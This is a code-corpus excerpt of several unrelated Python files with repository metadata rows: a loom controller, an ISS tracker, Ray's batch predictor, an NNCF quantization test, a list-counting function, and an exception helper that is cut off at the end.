"rectangle": [[0,1,
1,0],
[1,0,
0,1]],
"triangle": [[1,1,
0,0],
[0,1,
0,1],
[0,0,
1,1],
[1,0,
1,0]],
"square": [[0,0,0,1],[0,0,1,0],[0,1,0,0],[1,0,0,0],
[1,1,1,0],[1,1,0,1],[1,0,1,1],[0,1,1,1]]}
for address in mcp:
mcp23017.init_mcp(bus,address)
grid = tangible.sensor_grid(25,layout,tokens)
frequency=0.1
#######################################################
def convert_symbols(s):
return {tangible.convert_4bit_twist(v):k for k, v in s}
symbols = [["ccw",[1,1,1,1]],["cw",[0,0,0,0]],
["cw",[1,0,1,0]],["cw",[0,1,0,1]],
["flip-all",[1,1,0,0]],["flip-odd",[0,1,1,0]],["flip-even",[0,0,1,1]],["flip-fhalf",[1,0,0,1]],
["cw",[1,0,0,0]],["cw",[0,1,0,0]],["cw",[0,0,1,0]],["cw",[0,0,0,1]],
["cw",[0,1,1,1]],["cw",[1,0,1,1]],["cw",[1,1,0,1]],["cw",[1,1,1,0]]]
symbols = convert_symbols(symbols)
def build_pattern(data,symbols):
pat=[]
for i in range(0,4):
s=""
for v in data[i][:4]:
s+=symbols[v]+" "
pat.append(s)
return pat
def send_pattern(pat):
osc.Message("/eval",["(weave-instructions '(\n"+pat+"))"]).sendlocal(8000)
def send_col(col):
print("colour shift: "+col)
osc.Message("/eval",["(play-now (mul (adsr 0 0.1 1 0.1)"+
"(sine (mul (sine 30) 800))) 0)"+
"(set-warp-yarn! loom warp-yarn-"+col+")"+
"(set-weft-yarn! loom weft-yarn-"+col+")"]).sendlocal(8000)
#######################################################
last=""
last_col=0
while True:
for address in mcp:
grid.update(frequency,address,
mcp23017.read_inputs_a(bus,address),
mcp23017.read_inputs_b(bus,address))
pat = build_pattern(grid.data(4),symbols)
cc = pat[0]+pat[1]+pat[2]+pat[3]
if cc!=last:
last=cc
print(" "+pat[0]+pat[1]+pat[2]+pat[3]+"\n")
send_pattern(cc)
col=grid.state[15].value_current
if False: #col!=last_col:
last_col=col
if col==1: send_col("a")
if col==2: send_col("b")
if col==4: send_col("c")
if col==8: send_col("d")
if col==7: send_col("e")
if col==11: send_col("f")
if col==13: send_col("g")
if col==14: send_col("h")
#grid.pprint(5)
time.sleep(frequency)
| [
"dave@fo.am"
] | dave@fo.am |
e9054bddbbdc4a4c693bbaaf2cbc2fed48ce3e8f | 380372bbec9b77df14bb96fc32aca7061cca0635 | /astro/moon/iss1.py | cbe0e79c2cab4b1eabf19ca8b6856b125462b177 | [] | no_license | IchiroYoshida/python_public | d3c42dc31b3206db3a520a007ea4fb4ce6c1a6fd | 37ccadb1d3d42a38561c7708391f4c11836f5360 | refs/heads/master | 2023-08-16T17:19:07.278554 | 2023-08-13T21:29:51 | 2023-08-13T21:29:51 | 77,261,682 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | import math
import time
from datetime import datetime
import ephem
degrees_per_radian = 180.0 / math.pi
home = ephem.Observer()
home.lon = '-122.63' # +E
home.lat = '45.56' # +N
home.elevation = 80 # meters
# Always get the latest ISS TLE data from:
# http://spaceflight.nasa.gov/realdata/sightings/SSapplications/Post/JavaSSOP/orbit/ISS/SVPOST.html
iss = ephem.readtle('ISS',
'1 25544U 98067A 16165.54018716 .00016717 00000-0 10270-3 0 9008',
'2 25544 51.6441 76.2279 0000507 322.3584 37.7533 15.54548251 4412'
)
while True:
home.date = datetime.utcnow()
iss.compute(home)
print('iss: altitude %4.1f deg, azimuth %5.1f deg' % (iss.alt * degrees_per_radian, iss.az * degrees_per_radian))
time.sleep(1.0)
| [
"yoshida.ichi@gmail.com"
] | yoshida.ichi@gmail.com |
31485937618d68ef869db43a4abc1a65af4ada04 | 399fb29d8525b6d7ac298783675d0d56e37bcac7 | /python/ray/train/batch_predictor.py | 82345a70f395d7c0a16d12f90e8e441591e85d9e | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | AmeerHajAli/ray | 40c9aebe0da59e9bcd70303d981bfe6b65007991 | 1ffd032f5f793d8817217a040f0f636f9372cd56 | refs/heads/master | 2023-03-28T10:50:09.186561 | 2023-03-24T23:08:08 | 2023-03-24T23:08:08 | 175,129,851 | 1 | 0 | Apache-2.0 | 2019-03-12T03:39:16 | 2019-03-12T03:39:14 | null | UTF-8 | Python | false | false | 21,509 | py | import inspect
import logging
from typing import Any, Dict, Optional, List, Type, Union, Callable
import pandas as pd
import numpy as np
import ray
from ray.air import Checkpoint
from ray.air.data_batch_type import DataBatchType
from ray.air.util.data_batch_conversion import BatchFormat
from ray.data import Dataset, DatasetPipeline, Preprocessor
from ray.data.context import DatasetContext
from ray.train.predictor import Predictor
from ray.util.annotations import PublicAPI
logger = logging.getLogger(__name__)
@PublicAPI(stability="beta")
class BatchPredictor:
"""Batch predictor class.
Takes a predictor class and a checkpoint and provides an interface to run
batch scoring on Ray datasets.
This batch predictor wraps around a predictor class and executes it
in a distributed way when calling ``predict()``.
"""
def __init__(
self, checkpoint: Checkpoint, predictor_cls: Type[Predictor], **predictor_kwargs
):
self._checkpoint = checkpoint
# Store as object ref so we only serialize it once for all map workers
self._checkpoint_ref = ray.put(checkpoint)
self._predictor_cls = predictor_cls
self._predictor_kwargs = predictor_kwargs
self._override_preprocessor: Optional[Preprocessor] = None
self._override_preprocessor_set = False
def __repr__(self):
return (
f"{self.__class__.__name__}(checkpoint={self._checkpoint}, "
f"predictor_cls={self._predictor_cls.__name__})"
)
@classmethod
def from_checkpoint(
cls, checkpoint: Checkpoint, predictor_cls: Type[Predictor], **kwargs
) -> "BatchPredictor":
"""Create a :class:`BatchPredictor` from a
:class:`~ray.air.checkpoint.Checkpoint`.
Example:
.. testcode::
from torchvision import models
from ray.train.batch_predictor import BatchPredictor
from ray.train.torch import TorchCheckpoint, TorchPredictor
model = models.resnet50(pretrained=True)
checkpoint = TorchCheckpoint.from_model(model)
predictor = BatchPredictor.from_checkpoint(checkpoint, TorchPredictor)
Args:
checkpoint: A :class:`~ray.air.checkpoint.Checkpoint` containing model state
and optionally a preprocessor.
predictor_cls: The type of predictor to use.
**kwargs: Optional arguments to pass the ``predictor_cls`` constructor.
"""
return cls(checkpoint=checkpoint, predictor_cls=predictor_cls, **kwargs)
@classmethod
def from_pandas_udf(
cls, pandas_udf: Callable[[pd.DataFrame], pd.DataFrame]
) -> "BatchPredictor":
"""Create a Predictor from a Pandas UDF.
Args:
pandas_udf: A function that takes a pandas.DataFrame and other
optional kwargs and returns a pandas.DataFrame.
"""
class PandasUDFPredictor(Predictor):
@classmethod
def from_checkpoint(cls, checkpoint, **kwargs):
return PandasUDFPredictor()
def _predict_pandas(self, df, **kwargs) -> "pd.DataFrame":
return pandas_udf(df, **kwargs)
return cls(
checkpoint=Checkpoint.from_dict({"dummy": 1}),
predictor_cls=PandasUDFPredictor,
)
def get_preprocessor(self) -> Preprocessor:
"""Get the preprocessor to use prior to executing predictions."""
if self._override_preprocessor_set:
return self._override_preprocessor
return self._checkpoint.get_preprocessor()
def set_preprocessor(self, preprocessor: Preprocessor) -> None:
"""Set the preprocessor to use prior to executing predictions."""
self._override_preprocessor = preprocessor
self._override_preprocessor_set = True
def predict(
self,
data: Union[ray.data.Dataset, ray.data.DatasetPipeline],
*,
feature_columns: Optional[List[str]] = None,
keep_columns: Optional[List[str]] = None,
batch_size: int = 4096,
min_scoring_workers: int = 1,
max_scoring_workers: Optional[int] = None,
num_cpus_per_worker: Optional[int] = None,
num_gpus_per_worker: Optional[int] = None,
separate_gpu_stage: bool = True,
ray_remote_args: Optional[Dict[str, Any]] = None,
**predict_kwargs,
) -> Union[ray.data.Dataset, ray.data.DatasetPipeline]:
"""Run batch scoring on a Dataset.
.. note::
In Ray 2.4, `BatchPredictor` is lazy by default. Use one of the Datasets consumption APIs, such as iterating through the output, to trigger the execution of prediction.
Args:
data: Ray dataset or pipeline to run batch prediction on.
feature_columns: List of columns in the preprocessed dataset to use for
prediction. Columns not specified will be dropped
from `data` before being passed to the predictor.
If None, use all columns in the preprocessed dataset.
keep_columns: List of columns in the preprocessed dataset to include
in the prediction result. This is useful for calculating final
accuracies/metrics on the result dataset. If None,
the columns in the output dataset will contain
just the prediction results.
batch_size: Split dataset into batches of this size for prediction.
min_scoring_workers: Minimum number of scoring actors.
max_scoring_workers: If set, specify the maximum number of scoring actors.
num_cpus_per_worker: Number of CPUs to allocate per scoring worker.
Set to 1 by default.
num_gpus_per_worker: Number of GPUs to allocate per scoring worker.
Set to 0 by default. If you want to use GPUs for inference, please
specify this parameter.
separate_gpu_stage: If using GPUs, specifies whether to execute GPU
processing in a separate stage (enabled by default). This avoids
running expensive preprocessing steps on GPU workers.
ray_remote_args: Additional resource requirements to request from
ray.
predict_kwargs: Keyword arguments passed to the predictor's
``predict()`` method.
Returns:
Dataset containing scoring results.
Examples:
.. testcode::
import pandas as pd
import ray
from ray.train.batch_predictor import BatchPredictor
def calculate_accuracy(df):
return pd.DataFrame({"correct": df["preds"] == df["label"]})
# Create a batch predictor that returns identity as the predictions.
batch_pred = BatchPredictor.from_pandas_udf(
lambda data: pd.DataFrame({"preds": data["feature_1"]}))
# Create a dummy dataset.
ds = ray.data.from_pandas(pd.DataFrame({
"feature_1": [1, 2, 3], "label": [1, 2, 3]}))
# Execute batch prediction using this predictor.
predictions = batch_pred.predict(ds,
feature_columns=["feature_1"], keep_columns=["label"])
# print predictions and calculate final accuracy
print(predictions)
correct = predictions.map_batches(calculate_accuracy)
print(f"Final accuracy: {correct.sum(on='correct') / correct.count()}")
.. testoutput::
MapBatches(ScoringWrapper)
+- Dataset(num_blocks=1, num_rows=3, schema={feature_1: int64, label: int64})
Final accuracy: 1.0
""" # noqa: E501
if num_gpus_per_worker is None:
num_gpus_per_worker = 0
if num_cpus_per_worker is None:
if num_gpus_per_worker > 0:
# Don't request a CPU here, to avoid unnecessary contention. The GPU
# resource request suffices for scheduling.
num_cpus_per_worker = 0
else:
num_cpus_per_worker = 1
predictor_cls = self._predictor_cls
checkpoint_ref = self._checkpoint_ref
# Automatic set use_gpu in predictor constructor if user provided
# explicit GPU resources
if (
"use_gpu" in inspect.signature(predictor_cls.from_checkpoint).parameters
and "use_gpu" not in self._predictor_kwargs
and num_gpus_per_worker > 0
):
logger.info(
"`num_gpus_per_worker` is set for `BatchPreditor`."
"Automatically enabling GPU prediction for this predictor. To "
"disable set `use_gpu` to `False` in `BatchPredictor.predict`."
)
self._predictor_kwargs["use_gpu"] = True
predictor_kwargs_ref = ray.put(self._predictor_kwargs)
# In case of [arrow block] -> [X] -> [Pandas UDF] -> [Y] -> [TorchPredictor]
# We have two places where we can chose data format with less conversion cost.
# This is the [X], between data block and first preprocessor.
preprocessor_batch_format: BatchFormat = (
self._determine_preprocessor_batch_format(data)
)
# This is the [Y] in case of separated GPU stage prediction
predict_stage_batch_format: BatchFormat = (
self._predictor_cls._batch_format_to_use()
)
ctx = DatasetContext.get_current()
cast_tensor_columns = ctx.enable_tensor_extension_casting
class ScoringWrapper:
def __init__(self, override_prep: Preprocessor = None):
checkpoint = ray.get(checkpoint_ref)
predictor_kwargs = ray.get(predictor_kwargs_ref)
self._predictor = predictor_cls.from_checkpoint(
checkpoint, **predictor_kwargs
)
if cast_tensor_columns:
# Enable automatic tensor column casting at UDF boundaries.
self._predictor._set_cast_tensor_columns()
# We want preprocessing to happen before feature column selection.
# So we manually apply preprocessing in BatchPredictor rather
# than in Predictor.
self.override_prep = override_prep
self._predictor.set_preprocessor(None)
def _select_columns_from_input_batch(
self,
batch_data: DataBatchType,
select_columns: Optional[List[str]] = None,
):
"""Return a subset of input batch based on provided columns."""
# No select columns specified, use all columns.
if not select_columns:
return batch_data
elif isinstance(batch_data, np.ndarray):
raise ValueError(
f"Column name(s) {select_columns} should not be provided "
"for prediction input data type of ``numpy.ndarray``"
)
elif isinstance(batch_data, dict):
return {k: v for k, v in batch_data.items() if k in select_columns}
elif isinstance(batch_data, pd.DataFrame):
# Select a subset of the pandas columns.
return batch_data[select_columns]
def _keep_columns_from_input_batch(
self,
input_batch: DataBatchType,
prediction_output_batch: DataBatchType,
keep_columns: Optional[List[str]] = None,
):
"""Return a union of input batch and prediction output batch
based on provided columns.
"""
if not keep_columns:
return prediction_output_batch
elif isinstance(input_batch, np.ndarray):
raise ValueError(
f"Column name(s) {keep_columns} should not be provided "
"for prediction input data type of ``numpy.ndarray``"
)
elif isinstance(input_batch, dict):
for column in keep_columns:
prediction_output_batch[column] = input_batch[column]
return prediction_output_batch
elif isinstance(input_batch, pd.DataFrame):
prediction_output_batch[keep_columns] = input_batch[keep_columns]
return prediction_output_batch
def __call__(self, input_batch: DataBatchType) -> DataBatchType:
# TODO: Delegate separate_gpu_stage flag to Datasets.
if self.override_prep:
# Apply preprocessing before selecting feature columns.
input_batch = self.override_prep.transform_batch(input_batch)
# TODO (jiaodong): Investigate if there's room to optimize prediction
# result joins to minimize GPU <> CPU transfer
prediction_batch: DataBatchType = self._select_columns_from_input_batch(
input_batch, select_columns=feature_columns
)
prediction_output_batch: DataBatchType = self._predictor.predict(
prediction_batch, **predict_kwargs
)
prediction_output_batch: DataBatchType = (
self._keep_columns_from_input_batch(
input_batch, prediction_output_batch, keep_columns=keep_columns
)
)
return prediction_output_batch
compute = ray.data.ActorPoolStrategy(
min_size=min_scoring_workers, max_size=max_scoring_workers
)
ray_remote_args = ray_remote_args or {}
ray_remote_args["num_cpus"] = num_cpus_per_worker
ray_remote_args["num_gpus"] = num_gpus_per_worker
preprocessor = self.get_preprocessor()
override_prep = None
if preprocessor:
# TODO: Delegate separate_gpu_stage flag to Datasets.
if not separate_gpu_stage and num_gpus_per_worker > 0:
override_prep = preprocessor
else:
# In batch prediction, preprocessing is always done in a separate stage.
# We should not in-line it with prediction, unless separate_gpu_stage is
# False.
# Dataset optimizer will fuse preprocessing+prediction stage as
# necessary.
if isinstance(data, Dataset):
# Dataset is lazy by default so this transform
# will not trigger execution.
data = preprocessor.transform(data)
elif isinstance(data, DatasetPipeline):
data = preprocessor._transform_pipeline(data)
prediction_results = data.map_batches(
ScoringWrapper,
compute=compute,
batch_format=preprocessor_batch_format
if override_prep is not None
else predict_stage_batch_format,
batch_size=batch_size,
prefetch_batches=int(num_gpus_per_worker > 0),
fn_constructor_kwargs={"override_prep": override_prep},
**ray_remote_args,
)
return prediction_results
def predict_pipelined(
self,
data: ray.data.Dataset,
*,
blocks_per_window: Optional[int] = None,
bytes_per_window: Optional[int] = None,
# The remaining args are from predict().
feature_columns: Optional[List[str]] = None,
keep_columns: Optional[List[str]] = None,
batch_size: int = 4096,
min_scoring_workers: int = 1,
max_scoring_workers: Optional[int] = None,
num_cpus_per_worker: Optional[int] = None,
num_gpus_per_worker: Optional[int] = None,
separate_gpu_stage: bool = True,
ray_remote_args: Optional[Dict[str, Any]] = None,
**predict_kwargs,
) -> ray.data.DatasetPipeline:
"""Setup a prediction pipeline for batch scoring.
Unlike `predict()`, this generates a DatasetPipeline object and does not
perform execution. Execution can be triggered by pulling from the pipeline.
This is a convenience wrapper around calling `.window()` on the Dataset prior
to passing it `BatchPredictor.predict()`.
Args:
data: Ray dataset to run batch prediction on.
blocks_per_window: The window size (parallelism) in blocks.
Increasing window size increases pipeline throughput, but also
increases the latency to initial output, since it decreases the
length of the pipeline. Setting this to infinity effectively
disables pipelining.
bytes_per_window: Specify the window size in bytes instead of blocks.
This will be treated as an upper bound for the window size, but each
window will still include at least one block. This is mutually
exclusive with ``blocks_per_window``.
feature_columns: List of columns in data to use for prediction. Columns not
specified will be dropped from `data` before being passed to the
predictor. If None, use all columns.
keep_columns: List of columns in `data` to include in the prediction result.
This is useful for calculating final accuracies/metrics on the result
dataset. If None, the columns in the output dataset will contain just
the prediction results.
batch_size: Split dataset into batches of this size for prediction.
min_scoring_workers: Minimum number of scoring actors.
max_scoring_workers: If set, specify the maximum number of scoring actors.
num_cpus_per_worker: Number of CPUs to allocate per scoring worker.
num_gpus_per_worker: Number of GPUs to allocate per scoring worker.
separate_gpu_stage: If using GPUs, specifies whether to execute GPU
processing in a separate stage (enabled by default). This avoids
running expensive preprocessing steps on GPU workers.
ray_remote_args: Additional resource requirements to request from
ray.
predict_kwargs: Keyword arguments passed to the predictor's
``predict()`` method.
Returns:
DatasetPipeline that generates scoring results.
Examples:
.. testcode::
import pandas as pd
import ray
from ray.train.batch_predictor import BatchPredictor
# Create a batch predictor that always returns `42` for each input.
batch_pred = BatchPredictor.from_pandas_udf(
lambda data: pd.DataFrame({"a": [42] * len(data)}))
# Create a dummy dataset.
ds = ray.data.range_tensor(1000, parallelism=4)
# Setup a prediction pipeline.
print(batch_pred.predict_pipelined(ds, blocks_per_window=1))
.. testoutput::
DatasetPipeline(num_windows=4, num_stages=3)
"""
if blocks_per_window is None and bytes_per_window is None:
raise ValueError(
"It is required to specify one of `blocks_per_window` or "
"`bytes_per_window`."
)
pipe = data.window(
blocks_per_window=blocks_per_window, bytes_per_window=bytes_per_window
)
return self.predict(
pipe,
batch_size=batch_size,
feature_columns=feature_columns,
keep_columns=keep_columns,
min_scoring_workers=min_scoring_workers,
max_scoring_workers=max_scoring_workers,
num_cpus_per_worker=num_cpus_per_worker,
num_gpus_per_worker=num_gpus_per_worker,
separate_gpu_stage=separate_gpu_stage,
ray_remote_args=ray_remote_args,
**predict_kwargs,
)
def _determine_preprocessor_batch_format(
self, ds: Union[ray.data.Dataset, ray.data.DatasetPipeline]
) -> BatchFormat:
"""Determine batch format we use for the first preprocessor.
In case of [arrow block] -> [X] -> [Pandas/Numpy UDF] -> [Predictor]
We choose the best X based on dataset block format and preprocessor's
transform type to avoid unnecessary data conversion.
Args:
ds (Union[ray.data.Dataset, ray.data.DatasetPipeline]): Input
dataset or dataset pipeline.
Returns:
BatchFormat: Batch format to use for the preprocessor.
"""
preprocessor = self.get_preprocessor()
if preprocessor is None:
# No preprocessor, just use the predictor format.
return self._predictor_cls._batch_format_to_use()
# Code dealing with Chain preprocessor is in Chain._determine_transform_to_use
# Use same batch format as first preprocessor to minimize data copies.
return preprocessor._determine_transform_to_use()
| [
"noreply@github.com"
] | AmeerHajAli.noreply@github.com |
2c16aae7055c557dfb20f94c0770926fb487a646 | 62179a165ec620ba967dbc20016e890978fbff50 | /tests/onnx/quantization/test_min_max.py | f5f1710268d9668c58b04281785182c4aa05cfd7 | [
"Apache-2.0"
] | permissive | openvinotoolkit/nncf | 91fcf153a96f85da166aacb7a70ca4941e4ba4a4 | c027c8b43c4865d46b8de01d8350dd338ec5a874 | refs/heads/develop | 2023-08-24T11:25:05.704499 | 2023-08-23T14:44:05 | 2023-08-23T14:44:05 | 263,687,600 | 558 | 157 | Apache-2.0 | 2023-09-14T17:06:41 | 2020-05-13T16:41:05 | Python | UTF-8 | Python | false | false | 8,238 | py | # Copyright (c) 2023 Intel Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import List
import pytest
import nncf.onnx.graph.metatypes.onnx_metatypes as om
from nncf.common.graph.graph import NNCFNode
from nncf.common.graph.transformations.commands import TargetType
from nncf.onnx.graph.nncf_graph_builder import ONNXLayerAttributes
from nncf.onnx.graph.node_utils import get_quantization_axis
from nncf.onnx.graph.node_utils import get_reduction_shape
from nncf.onnx.graph.transformations.commands import ONNXTargetPoint
# pylint: disable=protected-access
@dataclass
class TestCase:
    """One scenario for ``test_get_reduction_shape``.

    Attributes:
        nncf_node: Node whose weight tensor is being quantized.
        target_point: Where quantization is applied (target type, node name, port).
        per_channel: Whether per-channel quantization is requested.
        ref_reduction_shape: Expected reduction shape; None for per-tensor cases.
    """

    # The class name starts with "Test", so pytest tries to collect it and
    # warns because the dataclass has an __init__. Opt out of collection.
    __test__ = False

    nncf_node: NNCFNode
    target_point: ONNXTargetPoint
    per_channel: bool
    ref_reduction_shape: List[int]
# Fixture scenarios for test_get_reduction_shape. They cover: per-tensor vs.
# per-channel quantization, convolution vs. GEMM weights, the transA/transB
# GEMM attributes, a one-dimensional weight tensor, and a weight on port 0.
test_cases = (
    # Per-tensor convolution weight: no quantization axis, so no reduction shape.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "conv_with_weight_per_tensor",
                NNCFNode.METATYPE_ATTR: om.ONNXConvolutionMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [3, 5, 8]}}),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="conv_with_weight_per_tensor",
            port_id=1,
        ),
        per_channel=False,
        ref_reduction_shape=None,
    ),
    # Per-channel convolution weight: reduce over all axes but the channel axis.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "conv_with_weight_per_channel",
                NNCFNode.METATYPE_ATTR: om.ONNXConvolutionMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [3, 5, 8]}}),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            # NOTE(review): does not match the node name above - looks like a
            # copy-paste slip; confirm the name is irrelevant to
            # get_quantization_axis before relying on it.
            target_node_name="gemm_with_weight_per_channel_0_port",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(1, 2),
    ),
    # Per-tensor GEMM weight.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_tensor",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [5, 8]}}),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="gemm_with_weight_per_tensor",
            port_id=1,
        ),
        per_channel=False,
        ref_reduction_shape=None,
    ),
    # Per-channel GEMM weight without explicit transA/transB attributes.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(weight_attrs={1: {"shape": [5, 8]}}),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            # NOTE(review): mismatched with the node name above (copy-paste?).
            target_node_name="gemm_with_weight_per_channel_0_port",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(0,),
    ),
    # Per-channel GEMM with explicit transA=0/transB=0 - same axis as the default.
    # NOTE(review): this node name is reused by the next case, so the
    # parametrize ids will collide and pytest will suffix them (id0/id1).
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_extra_attrs",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
                    weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 0, "transB": 0}
                ),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="gemm_with_weight_per_channel_extra_attrs",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(0,),
    ),
    # transA=1 must not affect the weight (port 1) axis.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_extra_attrs",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
                    weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 1, "transB": 0}
                ),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="gemm_with_weight_per_channel_extra_attrs",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(0,),
    ),
    # transB=1 transposes the weight, flipping the reduction axis to (1,).
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_transpose",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
                    weight_attrs={1: {"shape": [5, 8]}}, node_attrs={"transA": 0, "transB": 1}
                ),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="gemm_with_weight_per_channel_transpose",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(1,),
    ),
    # One-dimensional weight tensor: only axis 0 can be reduced.
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_transpose_one_dim",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
                    weight_attrs={1: {"shape": [5]}}, node_attrs={"transA": 0, "transB": 1}
                ),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            # NOTE(review): mismatched with the node name above (copy-paste?).
            target_node_name="gemm_with_weight_per_channel_0_port",
            port_id=1,
        ),
        per_channel=True,
        ref_reduction_shape=(0,),
    ),
    # Weight attached to input port 0 of GEMM (activation-side operand).
    TestCase(
        nncf_node=NNCFNode(
            {
                NNCFNode.ID_NODE_ATTR: 0,
                NNCFNode.NODE_NAME_ATTR: "gemm_with_weight_per_channel_0_port",
                NNCFNode.METATYPE_ATTR: om.ONNXGemmMetatype,
                NNCFNode.LAYER_ATTRIBUTES: ONNXLayerAttributes(
                    weight_attrs={0: {"shape": [10, 10, 5]}}, node_attrs={"transA": 0, "transB": 1}
                ),
            }
        ),
        target_point=ONNXTargetPoint(
            target_type=TargetType.OPERATION_WITH_WEIGHTS,
            target_node_name="gemm_with_weight_per_channel_0_port",
            port_id=0,
        ),
        per_channel=True,
        ref_reduction_shape=(0, 1),
    ),
)
@pytest.mark.parametrize(
    "test_case",
    test_cases,
    ids=[test_case.nncf_node.node_name for test_case in test_cases],
)
def test_get_reduction_shape(test_case):
    """Checks the correct return reduction shape in ONNXMinMaxAlgo.

    Edge cases:
        1) per-tensor.
        2) transpose axis of GEMM node.
        3) one dimensional weight tensor.
    """
    axis = get_quantization_axis(
        is_per_channel=test_case.per_channel,
        node=test_case.nncf_node,
        target_point=test_case.target_point,
    )

    # No axis means per-tensor quantization was requested; nothing to reduce.
    if axis is None:
        assert not test_case.per_channel
        return

    weight_shape = test_case.nncf_node.layer_attributes.weight_attrs[test_case.target_point.port_id]["shape"]
    assert get_reduction_shape(weight_shape, axis) == test_case.ref_reduction_shape
| [
"noreply@github.com"
] | openvinotoolkit.noreply@github.com |
2ccc9be68390f86c4dc72a2aed2aba3c9e87f173 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_169/ch146_2020_04_12_17_11_21_542240.py | 756543924c51ab18f1a1af082e34978cca04a01f | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 542 | py |
def conta_ocorrencias(lista):
    """Return a dict mapping each distinct element of *lista* to its count.

    Fixes over the previous version:
      - no longer mutates the caller's list (it removed duplicates in place);
      - no remove-while-iterating, which skipped elements;
      - counts are paired with their own element (the old count-list "dedup"
        removed counts by value, so equal counts of different elements could
        be matched to the wrong key);
      - single O(n) pass instead of repeated list.count() calls.
    """
    contagens = {}
    for elemento in lista:
        contagens[elemento] = contagens.get(elemento, 0) + 1
    return contagens
| [
"you@example.com"
] | you@example.com |
e66245d10fdc516e42f9e199e11f20956954434a | 490f5e517942f529ddc8c1e0d421a208ff1ca29b | /02_code/exctools.py | 828134802f8e1fac0826f0e6ff3cd498809b3b4f | [] | no_license | emnglang/py-lab | facdc464a8c84b90f06b5cb639315981c0b4ba8d | bc3566da81e0b2cfa9ce563ffc198d35294971a1 | refs/heads/master | 2020-03-25T15:10:42.856062 | 2018-08-24T14:54:33 | 2018-08-24T14:54:33 | 143,869,343 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | import sys, traceback
def safe(callee, *pargs, **kargs):
    """Call *callee* with the given arguments, reporting any exception it
    raises instead of propagating it.

    Prints the full traceback followed by a one-line "Got <type> <value>"
    summary; always returns None.
    """
    try:
        callee(*pargs, **kargs)
    except Exception as exc:  # was a bare except: now lets SystemExit/KeyboardInterrupt escape
        traceback.print_exc()
        # Same output as the old sys.exc_info()-based message.
        print('Got %s %s' % (type(exc), exc))
if __name__ == '__main__':
    # Self-demo: run a function that is known to raise (from the companion
    # oops2 module) and show that safe() reports it without crashing.
